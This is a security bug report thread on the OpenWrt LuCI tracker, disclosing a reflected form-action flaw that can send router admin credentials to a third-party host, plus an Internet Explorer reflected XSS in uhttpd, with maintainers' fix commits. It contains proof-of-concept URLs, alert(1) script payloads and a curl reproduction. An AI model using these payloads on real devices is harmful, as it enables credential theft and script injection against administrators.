openwrt/luci #1717: Possible to form post URL for the login page - potential leak of admin credentials

macintorsten, 2018-04-04:
By adding an extra / after the beginning of that path the login form will submitted to a third party web site.

Example:
```http://192.168.56.2//httpbin.org/anything/..%2f..%2f/cgi-bin/luci/```

Resulting HTML:
````&#x3C;form method=&#x22;post&#x22; action=&#x22;//httpbin.org/anything/..%2f..%2f/cgi-bin/luci/&#x22;&#x3E;```

The URL is reflected in the response. An attacker can use this to trick an admin to submitting the username and password to an attacker-controlled website. Modern browsers will likely make this hard to exploit especially since #1343 was introduced.

A possible solution should be to make sure the form action URL always starts with a leading `.` before the first `/`. 

Side note:

Another attack (XSS) that only works in Internet Explorer.
```http://192.168.56.2//192.168.56.2/..%2f/cgi-bin/luci/?iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii<script>alert(1)</script>```

IE does not encode `<` and `>` in the query string (as opposed to FF/Chrome) and because the form is submitted from the same domain, the XSS filter in IE doesn't block the XSS attack.

Let me know if there is another preferred method of reporting security issues.

macintorsten, 2018-04-04:
Regarding 2nd attack, note that we're not calling http://hostname/cgi-bin/luci. The HTTP 404 error handler for the web server has a reflected XSS issue:

>$ curl -s -D - 'http://192.168.56.2/hello?<script>alert(1)</script>'
>HTTP/1.1 404 Not Found
>Connection: Keep-Alive
>Transfer-Encoding: chunked
>Keep-Alive: timeout=20
>Content-Type: text/html
>
>&#x3C;h1&#x3E;Not Found&#x3C;/h1&#x3E;The requested URL /hello?&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E; was not found on this server.

This will be caught by IE XSS Filter. However, by posting from the same origin as you are posting to, it's possible bypass using same method as in 1st attack. 

Reproduce by:
1. Open **Internet Explorer** and navigate to `http://192.168.56.2//192.168.56.2/..%2f/cgi-bin/luci/?iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii<script>alert(1)</script>`
2. Login

Result: You will then post the credentials to `http://192.168.56.2/..%2f/cgi-bin/luci/?iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii<script>alert(1)</script>` and the XSS is triggered.

Note: `http://192.168.56.2/..%2f/cgi-bin/luci/` does not exist hence the 404 error.

jow-, 2018-04-04:
Then this XSS issue is unrelated to LuCI and needs to be fixed in uhttpd instead.

jow-, 2018-04-04:
Variant 1 addressed with 8c617c02b5de93c51c896d58b2496b29b2d2c5bd, 053c343ef18e209174e7161f4acf39bb02d25ff8, 8a8eb0d487da5a36bc3d123f36cb6c68e899185a, 697db81246bf9e3256c7217a00ee4e7757c87077

Variant 2 addressed with https://git.openwrt.org/?p=project/uhttpd.git;a=commitdiff;h=d3b95607a7f0961038674c7651a50215a0eb2db1, https://git.openwrt.org/?p=project/uhttpd.git;a=commitdiff;h=8109b957b668a90d4a9b00f1e9db3d8d7e491bf3

macintorsten, 2018-04-12:
Seems to working now. I'm closing.

closed 2018-04-12 by macintorsten